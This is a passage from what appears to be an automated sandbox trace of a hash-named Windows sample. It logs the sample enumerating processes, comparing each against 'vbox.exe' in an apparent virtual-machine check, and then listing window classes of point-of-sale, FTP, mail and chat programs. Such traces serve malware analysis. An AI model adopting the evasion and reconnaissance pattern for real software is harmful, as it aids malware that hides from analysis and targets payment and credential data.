lpString1="whatsapp.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.465] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0122.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="active-charge.exe", cchCount1=17, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.467] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0122.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="accupos.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.469] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0122.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="afr38.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.471] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0122.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aldelo.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.473] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0122.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ccv_server.exe", cchCount1=14, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.475] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0122.476] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="centralcreditcard.exe", cchCount1=21, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.477] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0122.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="creditservice.exe", cchCount1=17, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.478] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0122.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fpos.exe", cchCount1=8, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.480] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0122.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mxslipstream.exe", cchCount1=16, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.482] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0122.484] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isspos.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.484] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0122.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="edcsvr.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.486] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0122.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omnipos.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.488] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0122.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spcwin.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.490] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x132c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0122.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spgagentservice.exe", cchCount1=19, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.492] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0122.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utg2.exe", cchCount1=8, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.494] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="force which baby.exe")) returned 1 [0122.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="force which baby.exe", cchCount1=20, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.497] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="drive_law.exe")) returned 1 [0122.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="drive_law.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.500] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nor development rather.exe")) returned 1 [0122.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nor development rather.exe", cchCount1=26, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.502] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0122.504] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.504] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0122.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taskhostw.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.506] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0122.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="msfeedssync.exe", cchCount1=15, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.508] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0122.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsoClient.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.510] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0122.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sc.exe", cchCount1=6, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.511] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0122.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.513] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0122.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="audiodg.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.515] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x180, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0122.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conhost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.517] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xc98, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0122.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conhost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.518] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 1 [0122.520] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", cchCount1=68, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.520] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0 [0122.521] CloseHandle (hObject=0x208) returned 1 [0122.522] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.522] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.522] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.522] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0122.522] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0122.522] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0122.522] CharUpperBuffW (in: lpsz="AJJMOCPPKFEWODWKA", cchLength=0x11 | out: lpsz="AJJMOCPPKFEWODWKA") returned 0x11 [0122.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0122.522] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1c0 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3190 [0122.523] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0122.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0122.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.524] CharUpperBuffW (in: lpsz="CLASS", cchLength=0x5 | out: lpsz="CLASS") returned 0x5 [0122.524] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 0 [0122.524] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0122.524] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0122.524] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.524] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.524] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.525] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.525] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.525] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.525] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.525] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.525] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.526] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0122.526] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0122.526] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.526] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0122.526] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0122.527] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0122.527] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0122.527] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0122.527] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0122.528] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0122.528] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0122.528] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0122.528] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0122.528] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0122.529] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0122.529] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0122.529] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0122.529] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.529] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0122.530] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0122.530] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0122.530] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0122.530] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0122.531] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0122.531] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0122.531] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0122.531] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0122.531] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0122.531] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0122.531] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0122.532] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0122.532] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0122.532] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0122.532] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0122.532] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0122.532] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0122.533] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0122.533] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0122.533] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0122.533] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0122.533] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0122.533] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0122.533] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0122.534] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0122.534] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0122.534] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0122.539] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0122.539] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0122.540] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0122.540] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0122.540] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0122.540] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0122.541] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0122.541] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0122.541] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0122.541] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0122.541] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0122.541] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0122.542] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0122.542] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0122.542] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0122.542] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0122.542] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0122.543] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0122.543] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0122.543] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0122.543] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0122.544] 